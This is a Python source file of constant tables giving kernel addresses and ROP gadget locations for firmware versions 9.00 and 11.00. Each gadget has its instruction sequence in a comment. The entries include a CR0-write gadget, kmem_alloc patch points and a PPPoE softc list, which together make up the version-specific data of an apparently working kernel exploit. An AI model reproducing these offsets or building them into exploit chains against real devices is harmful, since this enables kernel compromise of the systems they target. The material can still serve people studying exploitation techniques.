# Copyright (C) 2024 Andy Nguyen
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
# FW 9.00
class OffsetsFirmware_900:
    """Kernel addresses and ROP gadget locations for firmware 9.00.

    Pure constant table: every attribute is a kernel virtual address (or a
    small displacement) specific to this firmware build. The attribute set
    mirrors ``OffsetsFirmware_1100`` so the two tables are interchangeable
    by name; the values themselves are not valid on any other version.
    Each gadget constant is preceded by a comment giving the instruction
    sequence found at that address.
    """

    PPPOE_SOFTC_LIST = 0xffffffff843ed9f8
    KERNEL_MAP = 0xffffffff84468d48
    SETIDT = 0xffffffff82512c40
    KMEM_ALLOC = 0xffffffff8257be70
    # NOTE(review): what PATCH1/PATCH2 refer to is not described here — see caller.
    KMEM_ALLOC_PATCH1 = 0xffffffff8257bf3c
    KMEM_ALLOC_PATCH2 = 0xffffffff8257bf44
    MEMCPY = 0xffffffff824714b0
    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949
    # Matches the [rsi + 0x3d] displacement used by FIRST_GADGET below.
    SECOND_GADGET_OFF = 0x3d
    # 0xffffffff82996603 : jmp qword ptr [rsi + 0x3d]
    FIRST_GADGET = 0xffffffff82996603
    # 0xffffffff82c76646 : push rbp ; jmp qword ptr [rsi]
    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c76646
    # 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151
    # 0xffffffff82941e46 : lea rsp, [rsi + 0x20] ; repz ret
    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82941e46
    # 0xffffffff826c52aa : add rsp, 0x28 ; pop rbp ; ret
    ADD_RSP_28_POP_RBP_RET = 0xffffffff826c52aa
    # 0xffffffff8251b08f : add rsp, 0xb0 ; pop rbp ; ret
    ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251b08f
    # 0xffffffff822008e0 : ret
    RET = 0xffffffff822008e0
    # 0xffffffff822391a8 : pop rdi ; ret
    POP_RDI_RET = 0xffffffff822391a8
    # 0xffffffff822aad39 : pop rsi ; ret
    POP_RSI_RET = 0xffffffff822aad39
    # 0xffffffff82322eba : pop rdx ; ret
    POP_RDX_RET = 0xffffffff82322eba
    # 0xffffffff822445e7 : pop rcx ; ret
    POP_RCX_RET = 0xffffffff822445e7
    # 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret
    POP_R8_POP_RBP_RET = 0xffffffff822ab4dd
    # 0xffffffff8279fa0f : pop r12 ; ret
    POP_R12_RET = 0xffffffff8279fa0f
    # 0xffffffff82234ec8 : pop rax ; ret
    POP_RAX_RET = 0xffffffff82234ec8
    # 0xffffffff822008df : pop rbp ; ret
    POP_RBP_RET = 0xffffffff822008df
    # 0xffffffff82bb687a : push rsp ; pop rsi ; ret
    PUSH_RSP_POP_RSI_RET = 0xffffffff82bb687a
    # 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0
    # 0xffffffff82b7450e : mov byte ptr [rcx], al ; ret
    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b7450e
    # 0xffffffff82632b9c : mov rdi, rbx ; call r12
    MOV_RDI_RBX_CALL_R12 = 0xffffffff82632b9c
    # 0xffffffff8235b387 : mov rdi, r14 ; call r12
    MOV_RDI_R14_CALL_R12 = 0xffffffff8235b387
    # 0xffffffff822e3d7e : mov rsi, rbx ; call rax
    MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d7e
    # 0xffffffff82363918 : mov r14, rax ; call r8
    MOV_R14_RAX_CALL_R8 = 0xffffffff82363918
    # 0xffffffff82cb683a : add rdi, rcx ; ret
    ADD_RDI_RCX_RET = 0xffffffff82cb683a
    # 0xffffffff82409557 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409557
    # 0xffffffff82b85693 : jmp r14
    JMP_R14 = 0xffffffff82b85693
# FW 11.00
class OffsetsFirmware_1100:
    """Kernel addresses and ROP gadget locations for firmware 11.00.

    Pure constant table with the same attribute names as
    ``OffsetsFirmware_900``, so callers can select a table by firmware
    version and read the same fields. Every value is specific to this
    firmware build and is not valid on any other version. Each gadget
    constant is preceded by a comment giving the instruction sequence
    found at that address.
    """

    PPPOE_SOFTC_LIST = 0xffffffff844e2578
    KERNEL_MAP = 0xffffffff843ff130
    SETIDT = 0xffffffff8245bdb0
    KMEM_ALLOC = 0xffffffff82445e10
    # NOTE(review): what PATCH1/PATCH2 refer to is not described here — see caller.
    KMEM_ALLOC_PATCH1 = 0xffffffff82445edc
    KMEM_ALLOC_PATCH2 = 0xffffffff82445ee4
    MEMCPY = 0xffffffff824dddf0
    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299
    # Matches the [rsi + 0x3e] displacement used by FIRST_GADGET below
    # (differs from the 0x3d used on 9.00).
    SECOND_GADGET_OFF = 0x3e
    # 0xffffffff82eb1f97 : jmp qword ptr [rsi + 0x3e]
    FIRST_GADGET = 0xffffffff82eb1f97
    # 0xffffffff82c75166 : push rbp ; jmp qword ptr [rsi]
    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c75166
    # 0xffffffff824b90e1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff824b90e1
    # 0xffffffff8293c8c6 : lea rsp, [rsi + 0x20] ; repz ret
    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293c8c6
    # 0xffffffff826cb2da : add rsp, 0x28 ; pop rbp ; ret
    ADD_RSP_28_POP_RBP_RET = 0xffffffff826cb2da
    # 0xffffffff824cdd5f : add rsp, 0xb0 ; pop rbp ; ret
    ADD_RSP_B0_POP_RBP_RET = 0xffffffff824cdd5f
    # 0xffffffff822007e4 : ret
    RET = 0xffffffff822007e4
    # 0xffffffff825f38ed : pop rdi ; ret
    POP_RDI_RET = 0xffffffff825f38ed
    # 0xffffffff8224a6a9 : pop rsi ; ret
    POP_RSI_RET = 0xffffffff8224a6a9
    # 0xffffffff822a4762 : pop rdx ; ret
    POP_RDX_RET = 0xffffffff822a4762
    # 0xffffffff8221170a : pop rcx ; ret
    POP_RCX_RET = 0xffffffff8221170a
    # 0xffffffff8224ae4d : pop r8 ; pop rbp ; ret
    POP_R8_POP_RBP_RET = 0xffffffff8224ae4d
    # 0xffffffff8279faaf : pop r12 ; ret
    POP_R12_RET = 0xffffffff8279faaf
    # 0xffffffff8221172e : pop rax ; ret
    POP_RAX_RET = 0xffffffff8221172e
    # 0xffffffff822008df : pop rbp ; ret
    POP_RBP_RET = 0xffffffff822008df
    # 0xffffffff82bb5c7a : push rsp ; pop rsi ; ret
    PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5c7a
    # 0xffffffff823ce260 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff823ce260
    # 0xffffffff8236ae58 : mov byte ptr [rcx], al ; ret
    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff8236ae58
    # 0xffffffff8233426c : mov rdi, rbx ; call r12
    MOV_RDI_RBX_CALL_R12 = 0xffffffff8233426c
    # 0xffffffff823340a7 : mov rdi, r14 ; call r12
    MOV_RDI_R14_CALL_R12 = 0xffffffff823340a7
    # 0xffffffff82512dce : mov rsi, rbx ; call rax
    MOV_RSI_RBX_CALL_RAX = 0xffffffff82512dce
    # 0xffffffff82624df8 : mov r14, rax ; call r8
    MOV_R14_RAX_CALL_R8 = 0xffffffff82624df8
    # 0xffffffff82cb535a : add rdi, rcx ; ret
    ADD_RDI_RCX_RET = 0xffffffff82cb535a
    # 0xffffffff8260f297 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8260f297
    # 0xffffffff82b84657 : jmp r14
    JMP_R14 = 0xffffffff82b84657